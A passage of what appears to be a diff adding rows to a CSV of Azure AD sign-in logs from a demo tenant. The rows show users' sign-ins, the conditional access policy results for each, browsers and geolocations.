'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",d57fb780-1a14-4a75-9a44-f6b037941600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,d57fb780-1a14-4a75-9a44-f6b037941600,SigninLogs,Sucess,41.90428925,-85.99833679
+1109,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:31.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ae4bb168-816c-4988-afd5-9bb3a91d0011,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",d57fb780-1a14-4a75-9a44-f6b097941600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,d57fb780-1a14-4a75-9a44-f6b097941600,SigninLogs,Sucess,41.90428925,-85.99833679
+1110,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:32.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,432c55f7-7ed4-4dab-96e9-ff522a94743e,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",d57fb780-1a14-4a75-9a44-f6b0d8941600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,d57fb780-1a14-4a75-9a44-f6b0d8941600,SigninLogs,Sucess,41.90428925,-85.99833679
+1111,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:20.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e4714c73-802e-4906-bf76-dfa9367f2346,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:34,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",246e5f30-378b-46e8-8b1d-2e86a5a41300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,246e5f30-378b-46e8-8b1d-2e86a5a41300,SigninLogs,Sucess,33.7984581,-84.38828278
+1112,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:29.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e1f377d0-0835-4932-84de-2140113c6a3c,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",6c1d2f35-9fdd-4afe-865b-104220b31400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,6c1d2f35-9fdd-4afe-865b-104220b31400,SigninLogs,Sucess,41.90428925,-85.99833679
+1113,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:20.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,48c4b914-ffa3-40ac-b607-8d4de9e072ee,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 17:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",dfcca72f-40c4-4044-85c7-4ddd1f001700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,dfcca72f-40c4-4044-85c7-4ddd1f001700,SigninLogs,Sucess,50.6406517,5.572050095
+1114,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:11.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3d6227b9-666d-4e5d-b270-2762aae41dcc,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:34,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",178eb907-c36d-4662-9369-da022fb01400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,178eb907-c36d-4662-9369-da022fb01400,SigninLogs,Sucess,33.7984581,-84.38828278
+1115,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:12.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8259ca4c-d647-4346-9fde-b08ac38d6032,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:34,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",178eb907-c36d-4662-9369-da0259b01400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,178eb907-c36d-4662-9369-da0259b01400,SigninLogs,Sucess,33.7984581,-84.38828278
+1116,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,37:53.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,48cd469f-e0d9-0000-54f3-7198bbc62913,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 